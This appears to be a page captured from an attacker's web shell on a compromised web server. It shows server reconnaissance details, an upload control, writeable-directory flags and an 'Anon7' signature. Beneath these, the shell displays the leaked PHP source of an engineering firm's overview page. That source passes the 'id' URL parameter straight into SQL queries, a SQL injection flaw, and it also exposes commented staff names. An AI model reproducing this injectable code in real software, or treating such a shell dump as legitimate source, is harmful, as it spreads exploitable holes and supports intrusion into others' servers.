KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/klengineers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/klengineers/overview.php
<?php
include('config/config.php');
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" type="text/css" href="css/style.css"  />
<title>Kallen & Lemelson</title>
<link href="css/global.css" rel="stylesheet" type="text/css" />
<link href="css/grid.css" rel="stylesheet" type="text/css" />
<link href="css/menu.css"  rel="stylesheet" type="text/css" media="all">
<link rel="shortcut icon" href="favicon.ico">
<link rel="icon" type="image/ico" href="/favicon.ico">

<style>
li{cursor:pointer; -moz-border-radius:0 10px 0 10px;margin:2px; padding:1px 1px 1px 1px;}
ul2 div{color: #666666; cursor: auto; display: none; font-size: 13px; padding: 5px 0 5px 20px; text-decoration: none; }
li div:hover{text-decoration:none !important;}
li:before {padding:10px 10px 10px 0; color:red; font-weight:bold;}
li.active:before {padding:10px 10px 10px 0; color:red; font-weight:bold;}
#toggle{width:430px; margin:0 auto; display:none; -webkit-display:none;}


.div-left-market ul2  {
	padding:10px 0 0 0;
	margin:0 0 0 0;
	width:47%;
	float:left;
}

.div-left-market ul2  li {
	padding:0 0 0 10px;
	margin:0 0 0 0;
	list-style:none; font-size:12px;
	background:url(images/menu-bg.jpg) repeat-y;
	line-height:35px; margin-bottom:2px;
	 
	
}

.div-left-market ul2  li a{
	text-decoration:none; padding-left:20px; background:url(images/li.jpg) no-repeat left center;  color:#FFFFFF; line-height:35px;
}
.div-left-market ul2  li a:hover{
	text-decoration:none; color:#343434;padding-left:20px;
}

</style>



</head>

<body>

<div id="wrapper">
<div id="site-home">
<div class="div-top">
<div class="logo" style="margin:36px 0 45px 0"><a href="index.php"><img src="images/logo.png" width="348" height="49" border="0" /></a></div>

<?php include_once('menu.php'); ?>


</div>

<?php
$ids=$_GET['id'];
$query="select * from aboutkl where `id`='$ids'";
$ans=mysql_query($query);
$row=mysql_fetch_array($ans);
if($row['id']!='12')
{
	$query3="select * from aboutdetail";
	$ans3=mysql_query($query3);
	$row3=mysql_fetch_array($ans3);
	if($row3['ab_id']==10)
	{

$query1="select * from aboutdetail where ab_id='$ids' Order by position ASC";
$ans1=mysql_query($query1);
$count=mysql_num_rows($ans1);
?>

<div class="content-part" <?php if($count==0){?>style="width:981px;";<?php }?>>
<?php $query2="select * from aboutdetail";
		$ans2=mysql_query($query2);
		$row2=mysql_fetch_array($ans2);
		if($row2['ab_id']!="")
		{
		if($ids!='8') {
		
?>

<div class="div-left-market" <?php if($count>0){?>style="height:auto; width:230px;"<?php }else{?>style="height:auto; width:auto;"<?php }?>>

<div id="toggle" <?php if($count>0){?>style="width:500px;" <?php } else {?>style="width:auto;"<?php }?>>
<ul2>
<?php 
while($row1=mysql_fetch_array($ans1))
{
?>
<li style="background:url(images/menu-bg.jpg) no-repeat left center\9;"><a href="#" style="color:#fff\9;"><?php echo $row1['name'];?></a></li>
<?php
$idl=$row1['id'];
?>
<div class="hidecontent">
<?php 
$queryexec="select * from names where l_id='$idl' Order by position ASC";
$ansquery=mysql_query($queryexec);
while($rowans=mysql_fetch_array($ansquery))
{
?>
	<li id="hideChild<?php echo $rowans['id'];?>"style="background:url(images/menu-bg.jpg) no-repeat left center\9;"><a style="background:url(images/li-dash.png) left center no-repeat;color:#fff\9; padding:0 0 0 25px\9;" href="career.php?id=<?php echo $rowans['id'];?>"><?php echo $rowans['l_name'];?></a></li>
<?php }?>    
	<!--<li><a href="#">Steven J. DiFlora, P.E. LEED® AP</a></li>-->
</div> 
<?php 
}
?>
<!--<li><a href="#">Principal</a></li>
<div>
	<li><a href="#">Samuel G. Turovsky, P.E.</a></li>
</div>    
<li><a href="#">Senior Associates</a></li>
<div>
	<li><a href="#">Marek Grebowiec, LEED® AP</a></li>
    <li><a href="#">Zevart Pensa</a></li>
    <li><a href="#">Carter Tse, P.E.</a></li>
</div>    
<li><a href="#">Associates</a></li>
<div>
	<li><a href="#">Sam Baytalsky</a></li>
    <li><a href="#">Valentin Matei</a></li>
    <li><a href="#">Jonathan Ottenstein, P.E.,LEED® AP</a></li>
    <li><a href="#">William J. Struss</a></li>
</div>    
<li><a href="#">Administrative</a></li>
<div>
	<li><a href="#">Mirela Nazarbechian</a></li>
    <li><a href="#">Rory McMahon</a></li>
</div> -->   
</ul2>
</div>
</div>


  <?php 
		}
  }
  ?>  
 <div class="div-right" <?php if($count>0){?>style="height:auto; float:right;" <?php } else {?>style="height:auto; float:left;"<?php }?>  >
    <div class="text-div"<?php if($count>0){?> style=" height:auto; float:right;"<?php } else {?>style=" height:auto; width:960px; float:left;margin-left:-10px;"<?php } ?>>
<div class="ab-img" style="width:400px;"><?php if($row['id']!='10'){?><img src="uploads/<?php echo $row['a_image1'];?>"border="0" width="400px;"/><?php }?></div>
<div class="detail" <?php if($count>0){?><?php if($row['id']!='10'){?>style="float:right;width:309px;"<?php }else{?>style="float:left;width:710px;"<?php } } else {?> style="height:auto;width:550px;float:right; margin-left:0px;"<?php }?> >
<h2><?php echo $row['a_name'];?></h2>
<p align="justify">
<?php echo stripslashes($row['a_readmore']);?></p>

  <!--<div class="pdf" style="margin-top:20px; background:none;" ><span class="pdf" style="margin-top:20px; background:none;"><?php if($row['id']=='9') {?><a href="#"><img src="images/button35.png" width="200px" height="62px" /></a><?php }?></span></div>-->

</div>
</div>
</div>

<?php
	}
	else
	{
		
		echo "<script>window.location='contact.php';</script>";
		 
	?>
<div style="float:left; width:980px; height:auto; padding:0px; margin:0px;">
  
    <?php 
	$query="select * from aboutkl where `id`='$ids'";
	$ans=mysql_query($query);
	$row=mysql_fetch_array($ans);
	?>
    
<div class="div-right" style="float:left; width:980px; height:auto; padding:0px; margin:0px; float:left;">   
<!--<div class="text-div"  style="width:961px; height:auto; position:relative;">
<div class="ab-img" style="width:400px;">
<img src="uploads/<?php echo $row['a_image1'];?>"border="0" width="400" height="365"  />
</div>
<div class="detail" style="float:right; width:550px;">
<h2><?php echo $row['a_name'];?></h2>
<p align="justify"><?php echo addslashes($row['a_description']);?>
<?php echo addslashes($row['a_readmore']);?></p>
  <!--<div class="pdf" style="margin-top:20px; background:none;">
  <a href="#"><img src="images/button35.png" width="280px" height="68px" /></a></div>-->
</div>




</div>
</div>
</div>
<?php



	}
	
	
	
	
 }
else
{
	echo "<script>window.location='contact.php';</script>";
}
?>



</div>

<div style="position:inherit;"></div>
<?php 
include_once('footer.php');

?>



<script language="javascript" type="text/javascript" src="includes/jquery.js"> </script>
<script language="javascript" type="text/javascript" src="includes/superfish.js"></script>
<script language="javascript" type="text/javascript" src="includes/dropdowns.js"></script>
<script language="javascript" type="text/javascript" src="includes/hoverIntent.js"></script>
<script language="JavaScript" type="text/JavaScript" src="/includes/swfobject.js"></script>


<script language="JavaScript" type="text/JavaScript" src="includes/jquery.cycle.all.min.js"></script>
<script type="text/javascript">
	$(document).ready(function() {
		$("li").click(function(){
			$(".hidecontent").hide(1000);
			$(this).toggleClass("active");
			$(this).next("div").stop('true','true').slideToggle("slow");
		});
		
		$('#toggle').css({"display":"block"});
	});
</script>


<div class="clear"></div>
</div>
</div>
</body>
</html>

Anon7 - 2021